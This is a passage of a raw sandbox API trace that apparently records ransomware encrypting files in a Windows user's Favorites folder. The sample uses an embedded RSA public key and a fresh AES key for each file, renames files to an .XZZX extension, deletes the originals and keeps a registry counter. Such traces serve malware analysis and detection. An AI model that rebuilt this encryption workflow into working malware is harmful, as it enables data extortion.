lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.600] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x116 [0045.600] SetErrorMode (uMode=0x1) returned 0x1 [0045.600] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0045.600] OutputDebugStringW (lpOutputString="end") [0045.601] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.601] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0045.601] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5a88) returned 1 [0045.601] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5a88, dwCertEncodingType=0x1, pInfo=0x3e40260*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40290*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40298*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5dd0) returned 1 [0045.601] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.602] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0045.602] CryptEncrypt (in: hKey=0x42e5dd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0045.602] CryptEncrypt (in: hKey=0x42e5dd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5b10*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5b10*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0045.602] WriteFile (in: hFile=0x558, lpBuffer=0x42d5b10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5b10*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0045.602] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0045.602] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.602] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0045.602] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0045.602] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x55c) returned 0x0 [0045.602] RegQueryValueExW (in: hKey=0x55c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x40, lpcbData=0x417dfdc*=0x4) returned 0x0 [0045.602] RegCloseKey (hKey=0x55c) returned 0x0 [0045.602] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x55c) returned 0x0 [0045.602] RegSetValueExW (in: hKey=0x55c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x41, cbData=0x4 | out: lpData=0x417dfec*=0x41) returned 0x0 [0045.602] RegCloseKey (hKey=0x55c) returned 0x0 [0045.603] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.603] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.603] CloseHandle (hObject=0x558) returned 1 [0045.604] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0045.604] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0045.604] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url")) returned 1 [0045.605] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url")) returned 0 Thread: id = 160 os_tid = 0x980 [0045.606] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.606] lstrcpyW (in: lpString1=0x417f460, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0045.606] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.606] SetErrorMode (uMode=0x1) returned 0x1 [0045.606] lstrcpyW (in: lpString1=0x417f860, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0045.606] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x975dc820, Data2=0x580f, Data3=0x4889, Data4=([0]=0xa7, [1]=0x8a, [2]=0x1a, [3]=0x93, [4]=0x3c, [5]=0x97, [6]=0xdd, [7]=0xcd))) returned 0x0 [0045.606] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0045.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0045.606] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1B49B9E018F35807975DC8201D0B3C4F.XZZX") returned 100 [0045.606] StrStrW (lpFirst="IE Add-on site.url", lpSrch="XZZX") returned 0x0 [0045.607] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x20) returned 1 [0045.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0045.607] ReadFile (in: hFile=0x550, lpBuffer=0x34e068, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0045.608] CloseHandle (hObject=0x550) returned 1 [0045.608] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0045.608] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0045.608] SetErrorMode (uMode=0x1) returned 0x1 [0045.608] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0045.608] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5b98) returned 1 [0045.610] CryptGenKey (in: hProv=0x42d5b98, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4f90) returned 1 [0045.713] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.713] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.713] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.713] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0045.713] CryptDestroyKey (hKey=0x42e4f90) returned 1 [0045.713] CryptReleaseContext (hProv=0x42d5b98, dwFlags=0x0) returned 1 [0045.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\1B49B9E018F35807975DC8201D0B3C4F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\1b49b9e018f35807975dc8201d0b3c4f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550 [0045.714] WriteFile (in: hFile=0x550, lpBuffer=0x34e068*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0045.714] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0045.714] WriteFile (in: hFile=0x550, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.714] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0045.714] WriteFile (in: hFile=0x550, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x24, lpOverlapped=0x0) returned 1 [0045.714] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae [0045.714] WriteFile (in: hFile=0x550, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.715] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb3 [0045.715] SetErrorMode (uMode=0x1) returned 0x1 [0045.715] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0045.715] OutputDebugStringW (lpOutputString="end") [0045.715] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.715] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0045.715] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5b98) returned 1 [0045.715] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5b98, dwCertEncodingType=0x1, pInfo=0x3e40330*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40360*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40368*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5e10) returned 1 [0045.715] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.716] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0045.716] CryptEncrypt (in: hKey=0x42e5e10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0045.716] CryptEncrypt (in: hKey=0x42e5e10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5c20*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5c20*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0045.716] WriteFile (in: hFile=0x550, lpBuffer=0x42d5c20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5c20*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0045.716] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0045.716] WriteFile (in: hFile=0x550, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.716] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0045.716] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0045.716] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x560) returned 0x0 [0045.717] RegQueryValueExW (in: hKey=0x560, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x41, lpcbData=0x417dfdc*=0x4) returned 0x0 [0045.717] RegCloseKey (hKey=0x560) returned 0x0 [0045.717] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x560) returned 0x0 [0045.717] RegSetValueExW (in: hKey=0x560, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x42, cbData=0x4 | out: lpData=0x417dfec*=0x42) returned 0x0 [0045.717] RegCloseKey (hKey=0x560) returned 0x0 [0045.717] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.717] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.717] CloseHandle (hObject=0x550) returned 1 [0045.718] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0045.718] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0045.718] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url")) returned 1 [0045.719] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url")) returned 0 Thread: id = 161 os_tid = 0x9c0 [0045.752] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.752] lstrcpyW (in: lpString1=0x417f460, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0045.752] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0045.752] SetErrorMode (uMode=0x1) returned 0x1 [0045.752] lstrcpyW (in: lpString1=0x417f860, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0045.752] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x344a51e9, Data2=0xf0a8, Data3=0x4d6a, Data4=([0]=0xba, [1]=0x16, [2]=0x44, [3]=0xf7, [4]=0xa5, [5]=0x9, [6]=0x6b, [7]=0x5f))) returned 0x0 [0045.752] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0045.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0045.752] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\FD9030E848C62D90344A51E94CDE11D8.XZZX") returned 100 [0045.752] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="XZZX") returned 0x0 [0045.752] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x20) returned 1 [0045.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0045.753] ReadFile (in: hFile=0x55c, lpBuffer=0x34e188, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0045.753] CloseHandle (hObject=0x55c) returned 1 [0045.753] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0045.753] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0045.754] SetErrorMode (uMode=0x1) returned 0x1 [0045.754] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0045.754] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5ca8) returned 1 [0045.756] CryptGenKey (in: hProv=0x42d5ca8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e4f90) returned 1 [0045.911] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.911] CryptExportKey (in: hKey=0x42e4f90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.911] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.912] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0045.912] CryptDestroyKey (hKey=0x42e4f90) returned 1 [0045.912] CryptReleaseContext (hProv=0x42d5ca8, dwFlags=0x0) returned 1 [0045.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\FD9030E848C62D90344A51E94CDE11D8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\fd9030e848c62d90344a51e94cde11d8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x55c [0045.912] WriteFile (in: hFile=0x55c, lpBuffer=0x34e188*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0045.913] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0045.913] WriteFile (in: hFile=0x55c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.913] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0045.913] WriteFile (in: hFile=0x55c, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x38, lpOverlapped=0x0) returned 1 [0045.913] SetFilePointer (in: hFile=0x55c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 